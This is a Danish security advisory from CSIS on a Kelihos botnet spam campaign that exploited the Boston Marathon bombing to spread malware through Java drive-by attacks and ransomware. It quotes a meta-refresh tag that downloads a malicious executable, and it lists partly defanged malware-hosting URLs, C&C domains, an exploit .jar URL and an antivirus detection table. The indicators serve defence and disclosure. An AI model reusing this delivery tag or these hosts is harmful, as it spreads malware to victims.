CSIS Nyheder: Boston terror misbruges i massiv spamkampagne

IT-kriminelle, som står bag det berygtende BOTnet Kelihos har siden i går aftes udsendt i tusindvis af spammails til vilkårlige e-mail adresser hvor lokkemaden er informationer om bombesprængningerne i forbindelse med Boston Marathon. Der anvendes forskelligt indhold og talrige BOTs som platform for infektionen som udnytter sårbarheder i bl.a. Java JRE.

Den uønskede e-mail ankommer med en emnelinje som f.eks.:

2 Explosions at Boston Marathon
Explosions at Boston Marathon
Aftermath to explosion at Boston Marathon
Video of Explosion at the Boston Marathon 2013

Indholdet:

[link til en kompromitteret BOT eller webside]

Se skærmdump herunder:


Hvis en modtager kan lokkes til at klikke på det medfølgende link vil man blive udsat for et drive-by angreb samt social engineering hvor man automatisk tilbydes filen "boston.avi_______.exe". Denne fil er en Kelihos variant som ved kørsel vil binde maskinen ind i det centrale BOTnet.

Filen som tilbydes kommer via en "meta refresh" (mellemrum indlagt af CSIS):

<meta http-equiv="refresh" content="60; url=http://188.2.1 64.112/boston.avi_______.exe">

Der er flere andre sider som tilbyder denne malware (mellemrum indlagt af CSIS):

http://178.1 37.120.224/boston.avi_______.exe
http://118.1 41.37.122/boston.avi_______.exe
http://95.69 .141.121/boston.avi_______.exe
http://85.19 8.81.26/boston.avi_______.exe

At der anvendes en lang liste af BOTs til at føde maskiner med den skadelige kode kan ses herunder (kort udsnit - mellemrum indlagt af CSIS)

http://37.229.92.116/boston.html
http://62.45.1 48.76/boston.html
http://178.13 7.120.224/news.html
http://188.2. 164.112/boston.html
http://190.24 5.177.248/boston.html
http://212.7 5.18.190/boston.html
http://46.23 3.4.113/boston.html
http://217.14 5.222.14/boston.html
http://219.19 8.196.116/news.html
http://24.180 .60.184/boston.html
http://24.214 .242.227/boston.html
http://109.87 .205.222/news.html
http://85.198 .81.26/news.html
http://85.204 .15.40/boston.html
http://91.241 .177.162/boston.html
http://94.153 .15.249/boston.html
http://94.28. 49.130/boston.html

Websiderne indeholder alle enten "boston.html" eller "news.html" samt den binære kode "boston.avi_______.exe".

Kelihos forbinder sig til flere C&C servere, som anvendes til at plante yderligere malware på maskinerne eksempelvis (mellemrum indlagt af CSIS):

ahf apjux.ru
cyl aktog.ru
fub kimab.ru
goj zawde.ru
ick yrjum.ru
low zepol.ru

Den sekundære payload i dette angreb er en klassisk ransomware som kidnapper ofrets data og herefter tvinger denne til at indbetale en løsesum via PaySafeCard.

Selve drive-by angrebet udføres ved brug af det kommercielle exploitkit RedKit. Der udnyttes bl.a. svagheder i Oracle Java JRE (mellemrum indlagt af CSIS):

http://liquidrealit ysolutions.com/gjc.jar

Blandt øvrige drive-by sider/domæner kan nævnes (mellemrum indlagt af CSIS):

http://www.apay aosvss.us
http://www.care coctrr.us
http://www.sacr addrtorch.us
http://godd amsel.org
http://techpour ri.com
http://dotn ax.com
http://abog adojuliorivera.com

Det pågældende Java arkiv vil tvangsfodre den pågældende maskine med Kelihos hvis Java JRE ikke er behørigt opdateret.

Vi har blokeret alle disse domæner samt flere end 30 andre i CSIS Secure DNS. Det betyder også at alle brugere af Heimdal PRO eller corporate (https://heimdalagent.com) er beskyttet mod den skadelige payload.

Udover at spamme disse e-mails ud anvendes også blackhat SEO tricks. Det betyder at personer, som eksempelvis søger på Google efter nyheder eller videoer af terrorangrebet i Boston kan lande på en af mange forskellige kompromitterede websider. Et blackhat SEO er følgende tekst: "Videos of Explosions at the Boston Marathon 2013". Disse sider peger på en drive-by side som misbruger Blackhole exploitkittet.

Antivirus detektion af den seneste Kelihos downloader opnår følgende result:

Antivirus    Result    Update
Agnitum     -     20130416
AhnLab-V3     -     20130416
AntiVir     -     20130417
Antiy-AVL     -     20130417
Avast     -     20130417
AVG     -     20130417
BitDefender     Trojan.GenericKDZ.14575     20130417
ByteHero     -     20130415
CAT-QuickHeal     -     20130417
ClamAV     -     20130417
Commtouch     -     20130417
Comodo     -     20130417
DrWeb     -     20130417
Emsisoft     Trojan.GenericKDZ.14575 (B)     20130417
eSafe     -     20130415
ESET-NOD32     -     20130416
F-Prot     -     20130416
F-Secure     Trojan.GenericKDZ.14575     20130417
Fortinet     W32/Kryptik.X!tr     20130417
GData     Trojan.GenericKDZ.14575     20130417
Ikarus     Trojan.SuspectCRC     20130417
Jiangmin     -     20130417
K7AntiVirus     -     20130416
K7GW     -     20130416
Kaspersky     HEUR:Trojan.Win32.Generic     20130417
Kingsoft     -     20130415
Malwarebytes     Malware.Packer.EGX7     20130417
McAfee     -     20130417
McAfee-GW-Edition     Heuristic.LooksLike.Win32.Suspicious.E     20130417
Microsoft     -     20130417
MicroWorld-eScan     Trojan.GenericKDZ.14575     20130417
NANO-Antivirus     -     20130417
Norman     -     20130416
nProtect     -     20130417
Panda     Suspicious file     20130416
PCTools     HeurEngine.MaliciousPacker     20130417
Sophos     -     20130417
SUPERAntiSpyware     -     20130417
Symantec     Packed.Generic.402     20130417
TheHacker     -     20130416
TotalDefense     -     20130416
TrendMicro     -     20130417
TrendMicro-HouseCall     TROJ_GEN.F47V0417     20130417
VBA32     -     20130416
VIPRE     -     20130417
ViRobot     -     20130417